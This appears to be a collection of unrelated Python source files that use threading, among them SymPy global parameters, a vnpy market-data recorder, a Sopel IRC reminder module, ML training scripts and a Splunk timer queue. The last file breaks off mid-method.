parameters.py
|
"""Thread-safe global parameters"""
from .cache import clear_cache
from contextlib import contextmanager
from threading import local
class _global_parameters(local):
"""
Thread-local global parameters.
Explanation
===========
This class provides a thread-local container for SymPy's global parameters.
Every global parameter must be passed as a keyword argument when an
instance is created.
A variable, `global_parameters`, is provided as the default instance of this class.
WARNING! Although the global parameters are thread-local, SymPy's cache is
currently not.
This may lead to undesired results in multi-threaded operations.
Examples
========
>>> from sympy.abc import x
>>> from sympy.core.cache import clear_cache
>>> from sympy.core.parameters import global_parameters as gp
>>> gp.evaluate
True
>>> x+x
2*x
>>> log = []
>>> def f():
... clear_cache()
... gp.evaluate = False
... log.append(x+x)
... clear_cache()
>>> import threading
>>> thread = threading.Thread(target=f)
>>> thread.start()
>>> thread.join()
>>> print(log)
[x + x]
>>> gp.evaluate
True
>>> x+x
2*x
References
==========
.. [1] https://docs.python.org/3/library/threading.html
"""
def __init__(self, **kwargs):
self.__dict__.update(kwargs)
def __setattr__(self, name, value):
if getattr(self, name) != value:
clear_cache()
return super().__setattr__(name, value)
global_parameters = _global_parameters(evaluate=True, distribute=True)
@contextmanager
def evaluate(x):
""" Control automatic evaluation
This context manager controls whether or not all SymPy functions evaluate
by default.
Note that much of SymPy expects evaluated expressions. This functionality
is experimental and is unlikely to function as intended on large
expressions.
Examples
========
>>> from sympy.abc import x
>>> from sympy.core.parameters import evaluate
>>> print(x + x)
2*x
>>> with evaluate(False):
... print(x + x)
x + x
"""
old = global_parameters.evaluate
try:
global_parameters.evaluate = x
yield
finally:
global_parameters.evaluate = old
@contextmanager
def distribute(x):
""" Control automatic distribution of Number over Add
This context manager controls whether or not Mul distributes Number over
Add. The plan is to avoid distributing Number over Add throughout SymPy. Once
that is done, this context manager will be removed.
Examples
========
>>> from sympy.abc import x
>>> from sympy.core.parameters import distribute
>>> print(2*(x + 1))
2*x + 2
>>> with distribute(False):
... print(2*(x + 1))
2*(x + 1)
"""
old = global_parameters.distribute
try:
global_parameters.distribute = x
yield
finally:
global_parameters.distribute = old
|
engine.py
|
""""""
from threading import Thread
from queue import Queue, Empty
from copy import copy
from vnpy.event import Event, EventEngine
from vnpy.trader.engine import BaseEngine, MainEngine
from vnpy.trader.object import (
SubscribeRequest,
TickData,
BarData,
ContractData
)
from vnpy.trader.event import EVENT_TICK, EVENT_CONTRACT
from vnpy.trader.utility import load_json, save_json, BarGenerator
from vnpy.trader.database import database_manager
APP_NAME = "DataRecorder"
EVENT_RECORDER_LOG = "eRecorderLog"
EVENT_RECORDER_UPDATE = "eRecorderUpdate"
class RecorderEngine(BaseEngine):
""""""
setting_filename = "data_recorder_setting.json"
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super().__init__(main_engine, event_engine, APP_NAME)
self.queue = Queue()
self.thread = Thread(target=self.run)
self.active = False
self.tick_recordings = {}
self.bar_recordings = {}
self.bar_generators = {}
self.load_setting()
self.register_event()
self.start()
self.put_event()
def load_setting(self):
""""""
setting = load_json(self.setting_filename)
self.tick_recordings = setting.get("tick", {})
self.bar_recordings = setting.get("bar", {})
def save_setting(self):
""""""
setting = {
"tick": self.tick_recordings,
"bar": self.bar_recordings
}
save_json(self.setting_filename, setting)
def run(self):
""""""
while self.active:
try:
task = self.queue.get(timeout=1)
task_type, data = task
if task_type == "tick":
database_manager.save_tick_data([data])
elif task_type == "bar":
database_manager.save_bar_data([data])
except Empty:
continue
def close(self):
""""""
"""收盘后最后k线生成
for vt_symbol in self.bar_recordings:
bg = self.get_bar_generator(vt_symbol)
bg.generate()"""
self.active = False
if self.thread.is_alive():
self.thread.join()
database_manager.close()
def start(self):
""""""
self.active = True
self.thread.start()
def add_bar_recording(self, vt_symbol: str):
""""""
if vt_symbol in self.bar_recordings:
self.write_log(f"已在K线记录列表中:{vt_symbol}")
return
contract = self.main_engine.get_contract(vt_symbol)
if not contract:
self.write_log(f"找不到合约:{vt_symbol}")
return
self.bar_recordings[vt_symbol] = {
"symbol": contract.symbol,
"exchange": contract.exchange.value,
"gateway_name": contract.gateway_name
}
self.subscribe(contract)
self.save_setting()
self.put_event()
self.write_log(f"添加K线记录成功:{vt_symbol}")
def add_tick_recording(self, vt_symbol: str):
""""""
if vt_symbol in self.tick_recordings:
self.write_log(f"已在Tick记录列表中:{vt_symbol}")
return
contract = self.main_engine.get_contract(vt_symbol)
if not contract:
self.write_log(f"找不到合约:{vt_symbol}")
return
self.tick_recordings[vt_symbol] = {
"symbol": contract.symbol,
"exchange": contract.exchange.value,
"gateway_name": contract.gateway_name
}
self.subscribe(contract)
self.save_setting()
self.put_event()
self.write_log(f"添加Tick记录成功:{vt_symbol}")
def remove_bar_recording(self, vt_symbol: str):
""""""
if vt_symbol not in self.bar_recordings:
self.write_log(f"不在K线记录列表中:{vt_symbol}")
return
self.bar_recordings.pop(vt_symbol)
self.save_setting()
self.put_event()
self.write_log(f"移除K线记录成功:{vt_symbol}")
def remove_tick_recording(self, vt_symbol: str):
""""""
if vt_symbol not in self.tick_recordings:
self.write_log(f"不在Tick记录列表中:{vt_symbol}")
return
self.tick_recordings.pop(vt_symbol)
self.save_setting()
self.put_event()
self.write_log(f"移除Tick记录成功:{vt_symbol}")
def register_event(self):
""""""
self.event_engine.register(EVENT_TICK, self.process_tick_event)
self.event_engine.register(EVENT_CONTRACT, self.process_contract_event)
def process_tick_event(self, event: Event):
""""""
tick = event.data
if tick.vt_symbol in self.tick_recordings:
self.record_tick(tick)
if tick.vt_symbol in self.bar_recordings:
bg = self.get_bar_generator(tick.vt_symbol)
bg.update_tick(tick)
def process_contract_event(self, event: Event):
""""""
contract = event.data
vt_symbol = contract.vt_symbol
if (vt_symbol in self.tick_recordings or vt_symbol in self.bar_recordings):
self.subscribe(contract)
def write_log(self, msg: str):
""""""
event = Event(
EVENT_RECORDER_LOG,
msg
)
self.event_engine.put(event)
def put_event(self):
""""""
tick_symbols = list(self.tick_recordings.keys())
tick_symbols.sort()
bar_symbols = list(self.bar_recordings.keys())
bar_symbols.sort()
data = {
"tick": tick_symbols,
"bar": bar_symbols
}
event = Event(
EVENT_RECORDER_UPDATE,
data
)
self.event_engine.put(event)
def record_tick(self, tick: TickData):
""""""
task = ("tick", copy(tick))
self.queue.put(task)
def record_bar(self, bar: BarData):
""""""
task = ("bar", copy(bar))
self.queue.put(task)
def get_bar_generator(self, vt_symbol: str):
""""""
bg = self.bar_generators.get(vt_symbol, None)
if not bg:
bg = BarGenerator(self.record_bar)
self.bar_generators[vt_symbol] = bg
return bg
def subscribe(self, contract: ContractData):
""""""
req = SubscribeRequest(
symbol=contract.symbol,
exchange=contract.exchange
)
self.main_engine.subscribe(req, contract.gateway_name)
|
__init__.py
|
from flask import Flask, render_template
from flask_bootstrap import Bootstrap
from flask_sqlalchemy import SQLAlchemy
from flask_migrate import Migrate
from flask_login import LoginManager
from config import Config, initialize, generate_peers
from app.node import Node
from threading import Thread
from flask import g
apps = []
chord_node = None
nodes = dict()
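# One chord Node is created per port returned by initialize(); the Flask app is
# wired up with Config, SQLAlchemy, Migrate, LoginManager and Bootstrap, and each
# (app, chord_node) pair is collected in `apps` (the threaded app.run call below
# is left commented out).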
app = Flask(__name__)
for port in initialize():
chord_node = Node(port, None, None)
nodes[ str(port) ] = chord_node
# print(f"Here is app before import: {app}")
# Config.update_port(port)
app.config.from_object(Config)
db = SQLAlchemy(app)
migrate = Migrate(app, db)
login = LoginManager(app)
login.login_view = "login"
login.login_message = "Please log in to access this page."
bootstrap = Bootstrap(str(port), app)
app.chord_node = chord_node
from app import routes, models
# Thread(target=app.run, kwargs={"port":port}).start()
apps.append([app, chord_node])
|
test_tomcat.py
|
# (C) Datadog, Inc. 2010-2017
# All rights reserved
# Licensed under Simplified BSD License (see LICENSE)
# stdlib
import os
import threading
import time
from types import ListType
import unittest
import mock
# 3p
from nose.plugins.attrib import attr
# project
from aggregator import MetricsAggregator
import logging
LOG_INFO = {
'log_to_event_viewer': False,
'log_to_syslog': False,
'syslog_host': None,
'syslog_port': None,
'log_level': logging.INFO,
'disable_file_logging': True,
'collector_log_file': '/var/log/datadog/collector.log',
'forwarder_log_file': '/var/log/datadog/forwarder.log',
'dogstatsd_log_file': '/var/log/datadog/dogstatsd.log',
'jmxfetch_log_file': '/var/log/datadog/jmxfetch.log',
'go-metro_log_file': '/var/log/datadog/go-metro.log',
}
with mock.patch('config.get_logging_config', return_value=LOG_INFO):
from jmxfetch import JMXFetch
from dogstatsd import Server
STATSD_PORT = 8126
class DummyReporter(threading.Thread):
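# Reporter thread that flushes the aggregator every `interval` seconds and keeps
# the most recent non-empty flush in self.metrics for the test to poll.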
def __init__(self, metrics_aggregator):
threading.Thread.__init__(self)
self.finished = threading.Event()
self.metrics_aggregator = metrics_aggregator
self.interval = 10
self.metrics = None
self.finished = False
self.start()
def run(self):
while not self.finished:
time.sleep(self.interval)
self.flush()
def flush(self):
metrics = self.metrics_aggregator.flush()
if metrics:
self.metrics = metrics
@attr(requires='tomcat')
class TestTomcat(unittest.TestCase):
def setUp(self):
aggregator = MetricsAggregator("test_host")
self.server = Server(aggregator, "localhost", STATSD_PORT)
self.reporter = DummyReporter(aggregator)
self.t1 = threading.Thread(target=self.server.start)
self.t1.start()
confd_path = os.path.join(os.path.dirname(__file__), 'ci')
# confd_path = os.path.join(os.environ['VOLATILE_DIR'], 'jmx_yaml')
self.jmx_daemon = JMXFetch(confd_path, {'dogstatsd_port': STATSD_PORT})
self.t2 = threading.Thread(target=self.jmx_daemon.run)
self.t2.start()
def tearDown(self):
self.server.stop()
self.reporter.finished = True
self.jmx_daemon.terminate()
def test_tomcat_metrics(self):
count = 0
while self.reporter.metrics is None:
time.sleep(1)
count += 1
if count > 25:
raise Exception("No metrics were received in 25 seconds")
metrics = self.reporter.metrics
self.assertTrue(isinstance(metrics, ListType))
self.assertTrue(len(metrics) > 0)
self.assertEquals(len([t for t in metrics if t['metric'] == "tomcat.threads.busy" and "instance:tomcat_instance" in t['tags']]), 2, metrics)
self.assertEquals(len([t for t in metrics if t['metric'] == "tomcat.bytes_sent" and "instance:tomcat_instance" in t['tags']]), 0, metrics)
self.assertTrue(len([t for t in metrics if "jvm." in t['metric'] and "instance:tomcat_instance" in t['tags']]) > 4, metrics)
|
remind.py
|
# coding=utf8
"""
remind.py - Sopel Reminder Module
Copyright 2011, Sean B. Palmer, inamidst.com
Licensed under the Eiffel Forum License 2.
http://sopel.chat
"""
from __future__ import unicode_literals
import os
import re
import time
import threading
import collections
import codecs
from datetime import datetime
from sopel.module import commands, example, NOLIMIT
import sopel.tools
from sopel.tools.time import get_timezone, format_time
try:
import pytz
except:
pytz = None
def filename(self):
name = self.nick + '-' + self.config.core.host + '.reminders.db'
return os.path.join(self.config.core.homedir, name)
def load_database(name):
data = {}
if os.path.isfile(name):
f = codecs.open(name, 'r', encoding='utf-8')
for line in f:
unixtime, channel, nick, message = line.split('\t')
message = message.rstrip('\n')
t = int(float(unixtime)) # WTFs going on here?
reminder = (channel, nick, message)
try:
data[t].append(reminder)
except KeyError:
data[t] = [reminder]
f.close()
return data
def dump_database(name, data):
f = codecs.open(name, 'w', encoding='utf-8')
for unixtime, reminders in sopel.tools.iteritems(data):
for channel, nick, message in reminders:
f.write('%s\t%s\t%s\t%s\n' % (unixtime, channel, nick, message))
f.close()
def setup(bot):
bot.rfn = filename(bot)
bot.rdb = load_database(bot.rfn)
def monitor(bot):
time.sleep(5)
while True:
now = int(time.time())
unixtimes = [int(key) for key in bot.rdb]
oldtimes = [t for t in unixtimes if t <= now]
if oldtimes:
for oldtime in oldtimes:
for (channel, nick, message) in bot.rdb[oldtime]:
if message:
bot.msg(channel, nick + ': ' + message)
else:
bot.msg(channel, nick + '!')
del bot.rdb[oldtime]
dump_database(bot.rfn, bot.rdb)
time.sleep(2.5)
targs = (bot,)
t = threading.Thread(target=monitor, args=targs)
t.start()
scaling = collections.OrderedDict([
('years', 365.25 * 24 * 3600),
('year', 365.25 * 24 * 3600),
('yrs', 365.25 * 24 * 3600),
('y', 365.25 * 24 * 3600),
('months', 29.53059 * 24 * 3600),
('month', 29.53059 * 24 * 3600),
('mo', 29.53059 * 24 * 3600),
('weeks', 7 * 24 * 3600),
('week', 7 * 24 * 3600),
('wks', 7 * 24 * 3600),
('wk', 7 * 24 * 3600),
('w', 7 * 24 * 3600),
('days', 24 * 3600),
('day', 24 * 3600),
('d', 24 * 3600),
('hours', 3600),
('hour', 3600),
('hrs', 3600),
('hr', 3600),
('h', 3600),
('minutes', 60),
('minute', 60),
('mins', 60),
('min', 60),
('m', 60),
('seconds', 1),
('second', 1),
('secs', 1),
('sec', 1),
('s', 1),
])
periods = '|'.join(scaling.keys())
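# `periods` is the alternation of every unit token above; remind() splits its
# argument on these tokens (e.g. "3h45m") and sums each piece into seconds.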
@commands('in')
@example('.in 3h45m Go to class')
def remind(bot, trigger):
"""Gives you a reminder in the given amount of time."""
if not trigger.group(2):
bot.say("Missing arguments for reminder command.")
return NOLIMIT
if trigger.group(3) and not trigger.group(4):
bot.say("No message given for reminder.")
return NOLIMIT
duration = 0
message = filter(None, re.split('(\d+(?:\.\d+)? ?(?:(?i)' + periods + ')) ?',
trigger.group(2))[1:])
reminder = ''
stop = False
for piece in message:
grp = re.match('(\d+(?:\.\d+)?) ?(.*) ?', piece)
if grp and not stop:
length = float(grp.group(1))
factor = scaling.get(grp.group(2).lower(), 60)
duration += length * factor
else:
reminder = reminder + piece
stop = True
if duration == 0:
return bot.reply("Sorry, didn't understand the input.")
if duration % 1:
duration = int(duration) + 1
else:
duration = int(duration)
timezone = get_timezone(
bot.db, bot.config, None, trigger.nick, trigger.sender)
create_reminder(bot, trigger, duration, reminder, timezone)
@commands('at')
@example('.at 13:47 Do your homework!')
def at(bot, trigger):
"""
Gives you a reminder at the given time. Takes hh:mm:ssTimezone
message. Timezone is any timezone Sopel takes elsewhere; the best choices
are those from the tzdb; a list of valid options is available at
http://sopel.chat/tz . The seconds and timezone are optional.
"""
if not trigger.group(2):
bot.say("No arguments given for reminder command.")
return NOLIMIT
if trigger.group(3) and not trigger.group(4):
bot.say("No message given for reminder.")
return NOLIMIT
regex = re.compile(r'(\d+):(\d+)(?::(\d+))?([^\s\d]+)? (.*)')
match = regex.match(trigger.group(2))
if not match:
bot.reply("Sorry, but I didn't understand your input.")
return NOLIMIT
hour, minute, second, tz, message = match.groups()
if not second:
second = '0'
if pytz:
timezone = get_timezone(bot.db, bot.config, tz,
trigger.nick, trigger.sender)
if not timezone:
timezone = 'UTC'
now = datetime.now(pytz.timezone(timezone))
at_time = datetime(now.year, now.month, now.day,
int(hour), int(minute), int(second),
tzinfo=now.tzinfo)
timediff = at_time - now
else:
if tz and tz.upper() != 'UTC':
bot.reply("I don't have timzeone support installed.")
return NOLIMIT
now = datetime.now()
at_time = datetime(now.year, now.month, now.day,
int(hour), int(minute), int(second))
timediff = at_time - now
duration = timediff.seconds
if duration < 0:
duration += 86400
create_reminder(bot, trigger, duration, message, 'UTC')
def create_reminder(bot, trigger, duration, message, tz):
t = int(time.time()) + duration
reminder = (trigger.sender, trigger.nick, message)
try:
bot.rdb[t].append(reminder)
except KeyError:
bot.rdb[t] = [reminder]
dump_database(bot.rfn, bot.rdb)
if duration >= 60:
remind_at = datetime.utcfromtimestamp(t)
timef = format_time(bot.db, bot.config, tz, trigger.nick,
trigger.sender, remind_at)
bot.reply('Okay, will remind at %s' % timef)
else:
bot.reply('Okay, will remind in %s secs' % duration)
|
train.py
|
# -*- coding: utf-8 -*-
##############################################################
# train.py
# Copyright (C) 2018 Tsubasa Hirakawa. All rights reserved.
##############################################################
import os
import time
import math
import numpy as np
import multiprocessing as mp
from MaxEntIRL import MaxEntIRL
from util import chunk_list, read_text
BASE_FILE = "./data/basename.txt"
TRAJECTORY_PATH = "./data/tracking"
FEATURE_MAP_FILE = "./data/feature_map/feature_map_3d.npy"
IMAGE_FILE = "./data/image/image2.png"
RESULT_DIR = "./RESULT"
CACHE_DIR = "./CACHE"
class Trainer:
def __init__(self, input_basename_list):
self.FLOAT_MAX = 1e30
self.FLOAT_MIN = 1e-30
self.n_cpu = mp.cpu_count()
self.basename_list = input_basename_list
self.split_base_list = chunk_list(self.basename_list, (len(self.basename_list) / self.n_cpu) + 1)
self.n_feature = np.load(FEATURE_MAP_FILE).shape[0]
self.n_data = len(input_basename_list)
self.w = np.ones(self.n_feature, dtype=np.float32) * 0.5
self.w_best = []
# empirical feature count
self.f_empirical = np.zeros(self.n_feature, dtype=np.float32)
self.f_expected = np.zeros(self.n_feature, dtype=np.float32)
self.f_gradient = np.zeros(self.n_feature, dtype=np.float32)
self.f_gradient_best = []
self.loglikelihood = 0.0
self.min_loglikelihood = -self.FLOAT_MAX
self.lam = 0.01
self.DELTA = 0.01
self.converged = False
self.pid = os.getpid()
# compute empirical feature count
for bname in self.basename_list:
tmp_model = MaxEntIRL()
tmp_model.load_trajectory(os.path.join(TRAJECTORY_PATH, bname + ".npy"))
tmp_model.update_weight(self.w)
tmp_model.load_features(FEATURE_MAP_FILE)
tmp_model.load_image(IMAGE_FILE)
self.f_empirical += tmp_model.compute_empirical_feature_count()
self.f_empirical /= self.n_feature
print "empirical feature count:", self.f_empirical
# make cache directory
if not os.path.exists(CACHE_DIR):
os.mkdir(CACHE_DIR)
def backward_forward_pass(self):
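# Fan the backward/forward passes out over the chunks of basenames, one process
# per chunk; each child saves its log-likelihoods and expected feature counts to
# CACHE_DIR, and the parent sums them up below.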
thread = []
for th_i, b_list in enumerate(self.split_base_list):
thread.append(mp.Process(target=self.back_forward_single_thread, args=(b_list, self.w, th_i)))
for t in thread:
t.start()
for t in thread:
t.join()
self.loglikelihood = 0.0
self.f_expected *= 0.0
for th_i, t in enumerate(thread):
ll_tmp = np.load(os.path.join(CACHE_DIR, "%d-%d-ll.npy" % (self.pid, th_i)))
f_exp_tmp = np.load(os.path.join(CACHE_DIR, "%d-%d-fexp.npy" % (self.pid, th_i)))
self.loglikelihood += np.sum(ll_tmp)
self.f_expected += np.sum(f_exp_tmp, axis=0)
self.loglikelihood /= float(self.n_data)
self.f_expected /= float(self.n_data)
def back_forward_single_thread(self, basename, weight, thread_index):
loglikelihood_tmp = []
f_expected_list = []
for bn in basename:
print bn
_start = time.time()
model = MaxEntIRL()
model.load_trajectory(os.path.join(TRAJECTORY_PATH, bn + ".npy"))
model.update_weight(weight)
model.load_features(FEATURE_MAP_FILE)
model.load_image(IMAGE_FILE)
model.compute_reward()
model.compute_soft_value_function()
model.compute_policy()
model.compute_forecast_distribution()
loglikelihood_tmp.append(model.compute_trajectory_likelihood())
f_expected_list.append(model.accumulate_expected_feature_count())
_end = time.time()
print "done. time", _end - _start
# save
np.save(os.path.join(CACHE_DIR, "%d-%d-ll.npy" % (self.pid, thread_index)), np.array(loglikelihood_tmp))
np.save(os.path.join(CACHE_DIR, "%d-%d-fexp.npy" % (self.pid, thread_index)), np.array(f_expected_list))
def gradient_update(self):
improvement = self.loglikelihood - self.min_loglikelihood
if improvement > self.DELTA:
self.min_loglikelihood = self.loglikelihood
elif -self.DELTA < improvement < self.DELTA:
improvement = 0
print "improved by", improvement
# update parameters
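# Exponentiated-gradient step: each weight is multiplied by exp(lam * gradient),
# which keeps the weights positive; lam is halved after a worsening step and
# doubled after an improving one.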
if improvement < 0:
print "NO IMPROVEMENT: decrease step size and redo"
self.lam = self.lam * 0.5
for f in range(self.n_feature):
self.w[f] = self.w_best[f] * math.exp(self.lam * self.f_gradient[f])
elif improvement > 0:
print "IMPROVEMENT: increase step size"
self.w_best = self.w.copy()
self.lam = self.lam * 2.0
for f in range(self.n_feature):
self.f_gradient[f] = self.f_empirical[f] - self.f_expected[f]
for f in range(self.n_feature):
self.w[f] = self.w_best[f] * math.exp(self.lam * self.f_gradient[f])
elif improvement == 0:
print "CONVERGED"
self.converged = True
print "lambda:", self.lam
print "f_empirical:", self.f_empirical
print "f_expected:", self.f_expected
def save_parameter(self, output_filename):
np.savetxt(output_filename, self.w)
if __name__ == '__main__':
if not os.path.exists(RESULT_DIR):
os.mkdir(RESULT_DIR)
basename_list = read_text(BASE_FILE)
trainer = Trainer(basename_list)
iteration = 0
while not trainer.converged:
start = time.time()
trainer.backward_forward_pass()
trainer.gradient_update()
trainer.save_parameter(os.path.join(RESULT_DIR, "weight-%03d.txt" % iteration))
iteration += 1
end = time.time()
print "time of this iteration:", end - start, "s"
trainer.save_parameter(os.path.join(RESULT_DIR, "weight.txt"))
print "train: done."
|
trainer.py
|
# coding: utf-8
###
# @file trainer.py
# @author Arsany Guirguis <arsany.guirguis@epfl.ch>
#
# @section LICENSE
#
# Copyright (c) 2020 Arsany Guirguis.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# @section DESCRIPTION
#
# AggregaThor implementation using Garfiled++ library, which is based on RPC
# this file can be used by both the parameter server and the workers
# original paper: https://mlsys.org/Conferences/2019/doc/2019/54.pdf
###
#!/usr/bin/env python
import os
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.distributed.rpc as rpc
import torch.optim as optim
from torch.distributed.rpc import RRef, rpc_async, remote
from time import time
import argparse
import sys
import json
import threading
import garfieldpp
from garfieldpp.worker import Worker
from garfieldpp.byzWorker import ByzWorker
from garfieldpp.server import Server
from garfieldpp.tools import get_bytes_com,convert_to_gbit, adjust_learning_rate
import aggregators
CIFAR_NUM_SAMPLES = 50000
#First, parse the inputs
parser = argparse.ArgumentParser(description="AggregaThor implementation using Garfield++ library", formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument("--master",
type=str,
default="",
help="Master node in the deployment. This node takes rank 0, usually the first PS.")
parser.add_argument("--rank",
type=int,
default=0,
help="Rank of a process in a distributed setup.")
parser.add_argument("--dataset",
type=str,
default="mnist",
help="Dataset to be used, e.g., mnist, cifar10,...")
parser.add_argument("--batch",
type=int,
default=32,
help="Minibatch size to be employed by each worker.")
parser.add_argument("--num_ps",
type=int,
default=1,
help="Number of parameter servers in the deployment (Vanilla AggregaThor uses 1 ps).")
parser.add_argument("--num_workers",
type=int,
default=1,
help="Number of workers in the deployment.")
parser.add_argument("--fw",
type=int,
default=0,
help="Number of declared Byzantine workers.")
parser.add_argument("--fps",
type=int,
default=0,
help="Number of declared Byzantine parameter servers (Vanilla AggregaThor does not assume Byzantine servers).")
parser.add_argument("--model",
type=str,
default='convnet',
help="Model to be trained, e.g., convnet, cifarnet, resnet,...")
parser.add_argument("--loss",
type=str,
default='nll',
help="Loss function to optimize against.")
parser.add_argument("--optimizer",
type=str,
default='sgd',
help="Optimizer to use.")
parser.add_argument("--opt_args",
type=json.loads,
default={'lr':'0.1'},
help="Optimizer arguments; passed in dict format, e.g., '{\"lr\":\"0.1\"}'")
parser.add_argument("--num_iter",
type=int,
default=5000,
help="Number of training iterations to execute.")
parser.add_argument("--gar",
type=str,
default='average',
help="Aggregation rule for aggregating gradients.")
parser.add_argument('--acc_freq',
type=int,
default=100,
help="The frequency of computing accuracy while training.")
parser.add_argument('--bench',
type=bool,
default=False,
help="If True, time elapsed in each step is printed.")
parser.add_argument('--log',
type=bool,
default=False,
help="If True, accumulated loss at each iteration is printed.")
FLAGS = parser.parse_args(sys.argv[1:])
master = FLAGS.master
assert len(master) > 0
rank = FLAGS.rank
assert rank >= 0
num_ps = FLAGS.num_ps
assert num_ps >= 1
num_workers = FLAGS.num_workers
assert num_workers >= 1
world_size = num_workers + num_ps
fw = FLAGS.fw
assert fw*2 < num_workers
fps = FLAGS.fps
assert fps*2 < num_ps
dataset = FLAGS.dataset
assert len(dataset) > 0
batch = FLAGS.batch
assert batch >= 1
model = FLAGS.model
assert len(model) > 0
loss = FLAGS.loss
assert len(loss) > 0
optimizer = FLAGS.optimizer
assert len(optimizer) > 0
opt_args = FLAGS.opt_args
for k in opt_args:
opt_args[k] = float(opt_args[k])
assert opt_args['lr']
num_iter = FLAGS.num_iter
assert num_iter > 0
gar = FLAGS.gar
assert len(gar) > 0
acc_freq = FLAGS.acc_freq
assert(acc_freq > 10)
bench = FLAGS.bench
if bench:
from timeit import timeit
else:
timeit = None
log = FLAGS.log
#os.environ['CUDA_VISIBLE_DEVICES'] = str((rank%2))
print("**** SETUP AT NODE {} ***".format(rank))
print("Number of workers: ", num_workers)
print("Number of servers: ", num_ps)
print("Number of declared Byzantine workers: ", fw)
print("Number of declared Byzantine parameter servers: ", fps)
print("GAR: ", gar)
print("Dataset: ", dataset)
print("Model: ", model)
print("Batch size: ", batch)
print("Loss function: ", loss)
print("Optimizer: ", optimizer)
print("Optimizer Args", opt_args)
print("Benchmarking? ", bench)
print("Logging loss at each iteration?", log)
print("------------------------------------")
sys.stdout.flush()
lr = opt_args['lr']
#initiating the GAR
gar = aggregators.gars.get(gar)
assert gar is not None
os.environ['MASTER_ADDR'] = master
os.environ['MASTER_PORT'] = '29500'
torch.manual_seed(1234) #For reproducibility
if torch.cuda.is_available():
torch.cuda.manual_seed_all(1234) #For reproducibility
if bench:
torch.backends.cudnn.benchmark=True
#convention: low ranks are reserved for parameter servers
if rank < num_ps:
rpc.init_rpc('ps:{}'.format(rank), rank=rank, world_size=world_size)
#Initialize a parameter server and write the training loop
ps = Server(rank, world_size, num_workers,1, fw, fps, 'worker:', 'ps:', batch, model, dataset, optimizer, **opt_args)
scheduler = torch.optim.lr_scheduler.MultiStepLR(ps.optimizer, milestones=[150, 250, 350], gamma=0.1) #This line shows the kind of customization that can be done outside the Garfield++ library
start_time = time()
iter_per_epoch = CIFAR_NUM_SAMPLES//(num_workers * batch) #this value records how many iterations make up one epoch
print("One EPOCH consists of {} iterations".format(iter_per_epoch))
sys.stdout.flush()
for i in range(num_iter):
if i%(iter_per_epoch*30) == 0 and i!=0: #One hack for better convergence with Cifar10
lr*=0.2
adjust_learning_rate(ps.optimizer, lr)
#training loop goes here
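#Each iteration the PS waits for gradients from (num_workers - fw) workers,
#aggregates them with the chosen GAR, and applies the aggregated gradient to the model.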
def train_step():
if bench:
bytes_rec = get_bytes_com() #record number of bytes sent before the training step to work as a checkpoint
with torch.autograd.profiler.profile(enabled=bench) as prof:
gradients = ps.get_gradients(i, num_workers-fw) #get_gradients(iter_num, num_wait_wrk)
aggr_grad = gar(gradients=gradients, f=fw) #aggr_grad = gar.aggregate(gradients)
ps.update_model(aggr_grad)
if bench:
print(prof.key_averages().table(sort_by="self_cpu_time_total"))
bytes_train = get_bytes_com()
print("Consumed bandwidth in this iteration: {} Gbits".format(convert_to_gbit(bytes_train-bytes_rec)))
# print("Memory allocated to GPU {} Memory cached on GPU {}".format(torch.cuda.memory_allocated(0), torch.cuda.memory_cached(0)))
sys.stdout.flush()
if timeit is not None:
res = timeit(train_step,number=1)
print("Training step {} takes {} seconds".format(i,res))
sys.stdout.flush()
else:
train_step()
if i%iter_per_epoch == 0:
def test_step():
acc = ps.compute_accuracy()
num_epochs = i/iter_per_epoch
print("Epoch: {} Accuracy: {} Time: {}".format(num_epochs,acc,time()-start_time))
sys.stdout.flush()
if timeit is not None:
res = timeit(test_step,number=1)
print("Test step takes {} seconds".format(res))
else:
# test_step() #Though threading is a good idea, applying it here messes up how the CPU is used alongside the GPU
# if model.startswith('resnet') and i!=0:
# scheduler.step()
threading.Thread(target=test_step).start()
else:
rpc.init_rpc('worker:{}'.format(rank-num_ps), rank=rank, world_size=world_size)
#initialize a worker here
Worker(rank, world_size, num_workers, batch, model, dataset, loss)
# ByzWorker(rank, world_size, num_workers, batch, model, dataset, loss, 'drop')
rpc.shutdown()
|
timer_queue.py
|
"""
A timer queue implementation
"""
import threading
import Queue
from time import time
import traceback
from splunktalib.timer import Timer
from splunktalib.common import log
logger = log.Logs().get_logger("util")
class TimerQueue(object):
"""
A timer queue implementation, runs a separate thread to handle timers
"""
import sortedcontainers as sc
def __init__(self):
self._timers = TimerQueue.sc.SortedSet()
self._cancelling_timers = {}
self._lock = threading.Lock()
self._wakeup_queue = Queue.Queue()
self._thr = threading.Thread(target=self._check_and_execute)
self._thr.daemon = True
self._started = False
def start(self):
"""
Start the timer queue so that it begins processing timers
"""
if self._started:
return
self._started = True
self._thr.start()
logger.info("TimerQueue started.")
def tear_down(self):
if not self._started:
return
self._started = False
self._wakeup(None)
self._thr.join()
def add_timer(self, callback, when, interval):
"""
Add timer to the queue
"""
timer = Timer(callback, when, interval)
with self._lock:
self._timers.add(timer)
self._wakeup()
return timer
def remove_timer(self, timer):
"""
Remove timer from the queue.
"""
with self._lock:
try:
self._timers.remove(timer)
except ValueError:
logger.info("Timer=%s is not in queue, move it to cancelling "
"list", timer.ident())
self._cancelling_timers[timer.ident()] = timer
def _check_and_execute(self):
wakeup_queue = self._wakeup_queue
while 1:
(next_expired_time, expired_timers) = self._get_expired_timers()
for timer in expired_timers:
try:
timer()
except Exception:
logger.error(traceback.format_exc())
self._reset_timers(expired_timers)
